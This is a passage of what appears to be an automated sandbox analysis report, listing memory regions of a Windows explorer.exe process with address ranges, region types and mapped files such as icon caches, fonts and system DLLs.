= 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 659 start_va = 0x4600000 end_va = 0x467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 660 start_va = 0x4700000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 661 start_va = 0x4810000 end_va = 0x4817fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 662 start_va = 0x4820000 end_va = 0x4820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004820000" filename = "" Region: id = 663 start_va = 0x4830000 end_va = 0x48affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 664 start_va = 0x48b0000 end_va = 0x49affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 665 start_va = 0x49b0000 end_va = 0x49f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 666 start_va = 0x4a00000 end_va = 0x4a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 667 start_va = 0x4a80000 end_va = 0x4aa0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellcomponents.pri" filename = "\\Windows\\SystemResources\\ShellComponents\\ShellComponents.pri" (normalized: "c:\\windows\\systemresources\\shellcomponents\\shellcomponents.pri") Region: id = 668 start_va = 0x4ab0000 end_va = 0x4b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ab0000" filename = "" Region: id = 669 start_va = 0x4b30000 end_va = 0x5021fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b30000" filename = "" Region: id = 670 start_va = 0x5030000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 671 start_va = 0x50b0000 end_va = 0x512ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 672 start_va = 0x5130000 end_va = 0x526efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 673 start_va = 0x5270000 end_va = 0x52effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 674 start_va = 0x52f0000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 675 start_va = 0x5370000 end_va = 0x53effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 676 start_va = 0x53f0000 end_va = 0x546ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 677 start_va = 0x5470000 end_va = 0x54effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005470000" filename = "" Region: id = 678 start_va = 0x54f0000 end_va = 0x54f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054f0000" filename = "" Region: id = 679 start_va = 0x5500000 end_va = 0x5500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 680 start_va = 0x5510000 end_va = 0x5510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005510000" filename = "" Region: id = 681 start_va = 0x5520000 end_va = 0x5520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005520000" filename = "" Region: id = 682 start_va = 0x5530000 end_va = 0x572ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 683 start_va = 0x5730000 end_va = 0x57affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005730000" filename = "" Region: id = 684 start_va = 0x57b0000 end_va = 0x582ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057b0000" filename = "" Region: id = 685 start_va = 0x58b0000 end_va = 0x58b7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 686 start_va = 0x58c0000 end_va = 0x58c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 687 start_va = 0x58e0000 end_va = 0x58e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 688 start_va = 0x58f0000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058f0000" filename = "" Region: id = 689 start_va = 0x5990000 end_va = 0x5997fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 690 start_va = 0x59a0000 end_va = 0x59a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 691 start_va = 0x59c0000 end_va = 0x59c7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 692 start_va = 0x59d0000 end_va = 0x59d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 693 start_va = 0x59e0000 end_va = 0x5a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059e0000" filename = "" Region: id = 694 start_va = 0x5b00000 end_va = 0x5b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 695 start_va = 0x5b20000 end_va = 0x5b27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 696 start_va = 0x5b30000 end_va = 0x5b77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b30000" filename = "" Region: id = 697 start_va = 0x5b80000 end_va = 0x637ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 698 start_va = 0x6380000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006380000" filename = "" Region: id = 699 start_va = 0x6400000 end_va = 0x647ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 700 start_va = 0x6480000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006480000" filename = "" Region: id = 701 start_va = 0x6500000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 702 start_va = 0x6580000 end_va = 0x6580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006580000" filename = "" Region: id = 703 start_va = 0x6590000 end_va = 0x6590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 704 start_va = 0x65a0000 end_va = 0x65a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065a0000" filename = "" Region: id = 705 start_va = 0x65b0000 end_va = 0x65bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000065b0000" filename = "" Region: id = 706 start_va = 0x65c0000 end_va = 0x65c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 707 start_va = 0x65e0000 end_va = 0x65e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000065e0000" filename = "" Region: id = 708 start_va = 0x65f0000 end_va = 0x65f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065f0000" filename = "" Region: id = 709 start_va = 0x6600000 end_va = 0x6601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006600000" filename = "" Region: id = 710 start_va = 0x6620000 end_va = 0x6621fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006620000" filename = "" Region: id = 711 start_va = 0x6630000 end_va = 0x6630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006630000" filename = "" Region: id = 712 start_va = 0x6670000 end_va = 0x6683fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "3968321142.pri" filename = "\\Windows\\rescache\\_merged\\2457103279\\3968321142.pri" (normalized: "c:\\windows\\rescache\\_merged\\2457103279\\3968321142.pri") Region: id = 713 start_va = 0x6690000 end_va = 0x6690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006690000" filename = "" Region: id = 714 start_va = 0x66b0000 end_va = 0x66b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066b0000" filename = "" Region: id = 715 start_va = 0x66d0000 end_va = 0x66d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000066d0000" filename = "" Region: id = 716 start_va = 0x66e0000 end_va = 0x66e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 717 start_va = 0x66f0000 end_va = 0x67effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066f0000" filename = "" Region: id = 718 start_va = 0x6870000 end_va = 0x6871fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006870000" filename = "" Region: id = 719 start_va = 0x6880000 end_va = 0x6883fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 720 start_va = 0x6890000 end_va = 0x6891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006890000" filename = "" Region: id = 721 start_va = 0x68e0000 end_va = 0x68effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068e0000" filename = "" Region: id = 722 start_va = 0x68f0000 end_va = 0x696ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068f0000" filename = "" Region: id = 723 start_va = 0x6980000 end_va = 0x6b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006980000" filename = "" Region: id = 724 start_va = 0x6b80000 end_va = 0x70fafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "prm0009.dll" filename = "\\Windows\\System32\\prm0009.dll" (normalized: "c:\\windows\\system32\\prm0009.dll") Region: id = 725 start_va = 0x7100000 end_va = 0x717ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 726 start_va = 0x7180000 end_va = 0x917ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007180000" filename = "" Region: id = 727 start_va = 0x9180000 end_va = 0x91fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009180000" filename = "" Region: id = 728 start_va = 0x9200000 end_va = 0x9200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009200000" filename = "" Region: id = 729 start_va = 0x9210000 end_va = 0x9235fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "zoneinfo64.res" filename = "\\Windows\\Globalization\\ICU\\zoneinfo64.res" (normalized: "c:\\windows\\globalization\\icu\\zoneinfo64.res") Region: id = 730 start_va = 0x9260000 end_va = 0x9260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009260000" filename = "" Region: id = 731 start_va = 0x9270000 end_va = 0x92effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009270000" filename = "" Region: id = 732 start_va = 0x92f0000 end_va = 0x96effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000092f0000" filename = "" Region: id = 733 start_va = 0x96f0000 end_va = 0x97effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 734 start_va = 0x9870000 end_va = 0x996ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 735 start_va = 0x9970000 end_va = 0x99effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009970000" filename = "" Region: id = 736 start_va = 0x99f0000 end_va = 0x9aeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 737 start_va = 0x9af0000 end_va = 0x9beffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 738 start_va = 0x9bf0000 end_va = 0x9ceffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 739 start_va = 0x9cf0000 end_va = 0x9e81fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.ui.shellcommon.pri" filename = "\\Windows\\SystemResources\\Windows.UI.ShellCommon\\Windows.UI.ShellCommon.pri" (normalized: "c:\\windows\\systemresources\\windows.ui.shellcommon\\windows.ui.shellcommon.pri") Region: id = 740 start_va = 0x9e90000 end_va = 0x9f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e90000" filename = "" Region: id = 741 start_va = 0x9f10000 end_va = 0x9f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 742 start_va = 0x9f90000 end_va = 0xa00ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f90000" filename = "" Region: id = 743 start_va = 0xa010000 end_va = 0xa08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a010000" filename = "" Region: id = 744 start_va = 0xa090000 end_va = 0xa10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a090000" filename = "" Region: id = 745 start_va = 0xa110000 end_va = 0xa19ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mun" filename = "\\Windows\\SystemResources\\SndVolSSO.dll.mun" (normalized: "c:\\windows\\systemresources\\sndvolsso.dll.mun") Region: id = 746 start_va = 0xa1a0000 end_va = 0xa21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1a0000" filename = "" Region: id = 747 start_va = 0xa220000 end_va = 0xa29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a220000" filename = "" Region: id = 748 start_va = 0xa2a0000 end_va = 0xa31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2a0000" filename = "" Region: id = 749 start_va = 0xa320000 end_va = 0xa39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a320000" filename = "" Region: id = 750 start_va = 0xa3a0000 end_va = 0xa49ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 751 start_va = 0xa4a0000 end_va = 0xa51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4a0000" filename = "" Region: id = 752 start_va = 0xa520000 end_va = 0xa59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a520000" filename = "" Region: id = 753 start_va = 0xa5a0000 end_va = 0xa61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a5a0000" filename = "" Region: id = 754 start_va = 0xa620000 end_va = 0xa69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a620000" filename = "" Region: id = 755 start_va = 0xa6a0000 end_va = 0xa6f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 756 start_va = 0xa700000 end_va = 0xb6fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 757 start_va = 0xb700000 end_va = 0xbefffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-245394380-2276627025-4024548581-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-245394380-2276627025-4024548581-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-245394380-2276627025-4024548581-1000.dat") Region: id = 758 start_va = 0xbf00000 end_va = 0xbfe9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 759 start_va = 0xbff0000 end_va = 0xc09efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.ui.xaml.resources.19h1.dll" filename = "\\Windows\\System32\\Windows.UI.Xaml.Resources.19h1.dll" (normalized: "c:\\windows\\system32\\windows.ui.xaml.resources.19h1.dll") Region: id = 760 start_va = 0xc0a0000 end_va = 0xc89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c0a0000" filename = "" Region: id = 761 start_va = 0xc920000 end_va = 0xc99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c920000" filename = "" Region: id = 762 start_va = 0xcc20000 end_va = 0xcc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc20000" filename = "" Region: id = 763 start_va = 0xcda0000 end_va = 0xce9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 764 start_va = 0xcea0000 end_va = 0xcf9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 765 start_va = 0xcfa0000 end_va = 0xd09ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 766 start_va = 0xd0a0000 end_va = 0xd19ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 767 start_va = 0xd1a0000 end_va = 0xd29ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 768 start_va = 0xd320000 end_va = 0xd811fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d320000" filename = "" Region: id = 769 start_va = 0xd820000 end_va = 0xd89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d820000" filename = "" Region: id = 770 start_va = 0xdc20000 end_va = 0xdd1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_32.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_32.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_32.db") Region: id = 771 start_va = 0xdd20000 end_va = 0xdd9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd20000" filename = "" Region: id = 772 start_va = 0xdea0000 end_va = 0xe04afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 773 start_va = 0xe050000 end_va = 0xe44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e050000" filename = "" Region: id = 774 start_va = 0xe650000 end_va = 0xe74ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 775 start_va = 0xe750000 end_va = 0xec41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e750000" filename = "" Region: id = 776 start_va = 0xee40000 end_va = 0xf331fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee40000" filename = "" Region: id = 777 start_va = 0xf340000 end_va = 0xf831fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f340000" filename = "" Region: id = 778 start_va = 0x10730000 end_va = 0x10c21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010730000" filename = "" Region: id = 779 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 780 start_va = 0x7ff4fde80000 end_va = 0x7ff4fde8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fde80000" filename = "" Region: id = 781 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 782 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 783 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 784 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 785 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 786 start_va = 0x7ff775a30000 end_va = 0x7ff775e72fff monitored = 0 entry_point = 0x7ff775ac6d20 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 787 start_va = 0x7ffc05530000 end_va = 0x7ffc05571fff monitored = 0 entry_point = 0x7ffc05536d40 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 788 start_va = 0x7ffc080e0000 end_va = 0x7ffc08829fff monitored = 0 entry_point = 0x7ffc081fb240 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 789 start_va = 0x7ffc08830000 end_va = 0x7ffc08883fff monitored = 0 entry_point = 0x7ffc08833650 region_type = mapped_file name = "msiso.dll" filename = "\\Windows\\System32\\msIso.dll" (normalized: "c:\\windows\\system32\\msiso.dll") Region: id = 790 start_va = 0x7ffc08890000 end_va = 0x7ffc088a5fff monitored = 0 entry_point = 0x7ffc08893a20 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 791 start_va = 0x7ffc09100000 end_va = 0x7ffc092adfff monitored = 0 entry_point = 0x7ffc09145290 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 792 start_va = 0x7ffc092b0000 end_va = 0x7ffc09313fff monitored = 0 entry_point = 0x7ffc092eca70 region_type = mapped_file name = "useroobe.dll" filename = "\\Windows\\System32\\oobe\\UserOOBE.dll" (normalized: "c:\\windows\\system32\\oobe\\useroobe.dll") Region: id = 793 start_va = 0x7ffc09320000 end_va = 0x7ffc09370fff monitored = 0 entry_point = 0x7ffc0934cd20 region_type = mapped_file name = "cloudexperiencehostbroker.dll" filename = "\\Windows\\System32\\CloudExperienceHostBroker.dll" (normalized: "c:\\windows\\system32\\cloudexperiencehostbroker.dll") Region: id = 794 start_va = 0x7ffc09490000 end_va = 0x7ffc094fefff monitored = 0 entry_point = 0x7ffc094d3190 region_type = mapped_file name = "fhcfg.dll" filename = "\\Windows\\System32\\fhcfg.dll" (normalized: "c:\\windows\\system32\\fhcfg.dll") Region: id = 795 start_va = 0x7ffc09760000 end_va = 0x7ffc09839fff monitored = 0 entry_point = 0x7ffc09766450 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 796 start_va = 0x7ffc0afd0000 end_va = 0x7ffc0b175fff monitored = 0 entry_point = 0x7ffc0b026b40 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.207_none_faee9ef77614c0c2\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.207_none_faee9ef77614c0c2\\gdiplus.dll") Region: id = 797 start_va = 0x7ffc0b980000 end_va = 0x7ffc0bb8dfff monitored = 0 entry_point = 0x7ffc0baf4360 region_type = mapped_file name = "taskflowui.dll" filename = "\\Windows\\ShellComponents\\TaskFlowUI.dll" (normalized: "c:\\windows\\shellcomponents\\taskflowui.dll") Region: id = 798 start_va = 0x7ffc0bb90000 end_va = 0x7ffc0bc0cfff monitored = 0 entry_point = 0x7ffc0bbd5320 region_type = mapped_file name = "tilecontrol.dll" filename = "\\Windows\\ShellExperiences\\TileControl.dll" (normalized: 